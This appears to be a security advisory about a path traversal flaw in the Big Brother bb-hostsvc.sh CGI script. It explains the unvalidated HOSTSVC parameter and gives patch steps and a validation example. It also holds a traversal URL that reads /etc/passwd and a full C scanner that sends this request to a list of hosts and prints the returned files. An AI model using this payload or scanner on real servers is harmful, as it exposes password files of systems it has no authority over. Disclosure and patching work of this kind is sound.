COMMAND
Big Brother
SYSTEMS AFFECTED
Big Brother up to and including 1.4H
PROBLEM
Eric Hines posted the following. With the code below you can view the
contents of any file on the remote system that the web server account
can read, including /etc/passwd or /etc/shadow. The problem was
identified, and the proof of concept written, by Safety and Loki [LoA].
The problem is in the code below: the value of $HOSTSVC, taken straight
from the CGI query string, is joined to $BBLOGS to build a file path
without any validation, so "../" sequences walk out of the status-log
directory.
---- snip ----
# get the color of the status from the status file
set `$CAT "$BBLOGS/$HOSTSVC" | $HEAD -1` >/dev/null 2>&1
BKG="$1"
---- snap ----
Example:
http://www.bb4.com/cgi-bin/bb-hostsvc.sh?HOSTSVC=/../../../../../../../../etc/passwd
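The check the snippet above lacks, as an added example in POSIX sh (not code from the advisory or from BB4): HOSTSVC is validated as a bare status-file name before it is joined to $BBLOGS. The file layout (status files named host.service with commas standing in for dots in the host name) is an assumption, and the status file is constructed here.

```shell
#!/bin/sh
# Added example, not code from the advisory or from BB4: validate the HOSTSVC
# CGI parameter before it is joined to $BBLOGS. The vulnerable snippet runs
# `$CAT "$BBLOGS/$HOSTSVC"` with no check, so a value such as
# /../../../../../../../../etc/passwd walks out of the status-log directory.

# Assumed: status files live in $BBLOGS and are named "host.service", with
# commas standing in for the dots of the host name (www,example,com.conn).
BBLOGS=${BBLOGS:-$(mktemp -d)}

# Constructed sample status file; the first word of line 1 is the colour,
# which is what the original snippet extracts with `set` and BKG="$1".
printf 'green Tue Jul 11 10:00:00 2000 conn ok\n' > "$BBLOGS/www,example,com.conn"

# valid_hostsvc NAME -> status 0 only for a bare status-file name.
# Rejects empty values, any "/" (absolute paths and traversal), "..", names
# starting with "." and any character outside [A-Za-z0-9,._-].
valid_hostsvc() {
    name=$1
    [ -n "$name" ] || return 1
    case $name in
        */*|*..*|.*) return 1 ;;
    esac
    rest=$(printf '%s' "$name" | LC_ALL=C tr -d 'A-Za-z0-9,._-')
    [ -z "$rest" ] || return 1
    return 0
}

# status_color NAME -> prints the colour from the status file, or "invalid"
# when the name fails validation and "unknown" when no such file exists.
# The filesystem is only touched after the name has passed validation.
status_color() {
    valid_hostsvc "$1" || { echo invalid; return 1; }
    f="$BBLOGS/$1"
    [ -f "$f" ] || { echo unknown; return 1; }
    set -- $(head -1 "$f")
    echo "${1:-unknown}"
}
```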
Here's the scanner for this vulnerability:
/*
 *
 * 2000-07-11
 *
 * Ripped from phfscan.c
 * Big Brother Vulnerability scanner.
 * Scans for /cgi-bin/bb-hostsvc.sh.
 * If it exists you might be able to read files from
 * the system. Good luck.
 *
 *
 * Author: Safety@IRCnet who also discovered the bug.
 * Safety@LinuxMail.ORG
 *
 *
 * Credits: #roothat, #vastervik, #smile, Loki, crimson, self,
 * Bjurr, Metoo, and everyone else who think they should
 * be on this list.
 *
 * Special Thanks goes to Loki who is going to host and design
 * my homepage.
 *
 *
 * Usage:
 *
 * ./bbscan < hostlist > outputfile
 *
 */
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <signal.h>
#include <string.h>
#include <stdio.h>
#include <unistd.h>
#ifdef LINUX
#include <sys/time.h>
#endif

/* Cleared by the SIGALRM handler when connect() does not finish in time */
volatile sig_atomic_t FLAG = 1;

void Call(int signo)
{
    (void) signo;
    FLAG = 0;
}

int main(int argc, char *argv[])
{
    char host[100], hosta[1024], FileBuf[8097];
    int outsocket, X;
    struct hostent *nametocheck;
    struct sockaddr_in serv_addr;
    struct in_addr outgoing;
    /* HTTP/0.9-style request carrying the traversal value from the advisory */
    char bbvuln[] = "GET /cgi-bin/bb-hostsvc.sh?HOSTSVC=/../../../../../../../../etc/passwd\n\n";

    (void) argc;
    (void) argv;
    /* one host name per line on stdin */
    while (fgets(hosta, 100, stdin))
    {
        if (hosta[0] == '\0')
            break;
        hosta[strcspn(hosta, "\r\n")] = '\0';   /* strip the line ending */
        write(1, hosta, strlen(hosta));
        write(1, "\n", 1);
        outsocket = socket(AF_INET, SOCK_STREAM, 0);
        memset(&serv_addr, 0, sizeof(serv_addr));
        serv_addr.sin_family = AF_INET;
        nametocheck = gethostbyname(hosta);
        if (nametocheck == NULL)                /* unresolvable host: skip it */
        {
            close(outsocket);
            continue;
        }
        /* Ugly stuff to get host name into inet_ntoa form */
        memcpy(&outgoing.s_addr, nametocheck->h_addr_list[0],
               sizeof(outgoing.s_addr));
        strncpy(host, inet_ntoa(outgoing), 100);
        host[99] = '\0';
        serv_addr.sin_addr.s_addr = inet_addr(host);
        serv_addr.sin_port = htons(80);
        signal(SIGALRM, Call);
        FLAG = 1;
        alarm(10);                              /* give up on the connect after 10 s */
        X = connect(outsocket, (struct sockaddr *) &serv_addr, sizeof(serv_addr));
        alarm(0);
        if (FLAG == 1 && X == 0) {
            write(outsocket, bbvuln, strlen(bbvuln));
            /* copy the response to stdout; stop on EOF or read error */
            while ((X = read(outsocket, FileBuf, 8096)) > 0)
                write(1, FileBuf, X);
        }
        close(outsocket);
    }
    return 0;
}
SOLUTION
BB4 Technologies has already been notified and a patch is already
out. It can be downloaded from
http://www.bb4.com/download.html
The fix is required only on hosts that are defined as BBDISPLAY. Don't
forget hosts that were at one point BBDISPLAY but were turned into
client-only hosts afterwards.
1) If you have BBLOGSTATUS=DYNAMIC set in etc/bbdef.sh, then
download BB 1.4h2 and extract bb-hostsvc.sh. Replace the
script in the cgi-bin and set the BBHOME variable in the
bb-hostsvc.sh script. Make sure the script has the proper
permissions.
2) If you have BBLOGSTATUS=STATIC or BBLOGSTATUS=TEXT set in
etc/bbdef.sh, then just remove the bb-hostsvc.sh from the
cgi-bin directory as it is not required for these setups.
3) Set BBLOGSTATUS=STATIC in bbdef.sh and remove the script as
described in 2).
Jake Schleich found that by just downloading the new 1.4h2 and
running the bbconfig and filling in the variables, it overwrote
the offending file without me having to reinstall the entire
thing; a pain when it comes to reconfiguring. It asks which files
it will overwrite in the cgi-bin, you just say no to the custom
ones (if you have replaced a few of the default bb cgi's with /ext
released versions as I have) and replace the offending file(s).
So in short, the bbconfig script will fix the problem without a
rebuild.